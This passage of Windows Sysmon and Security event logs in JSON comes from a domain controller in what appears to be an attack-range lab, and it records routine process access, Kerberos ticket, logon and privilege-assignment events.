05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4420,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4421,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220485,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220486,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220487,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6736B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6736b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220488,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6736B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6736b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4422,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4423,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4424,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:15.373\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:15.373","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL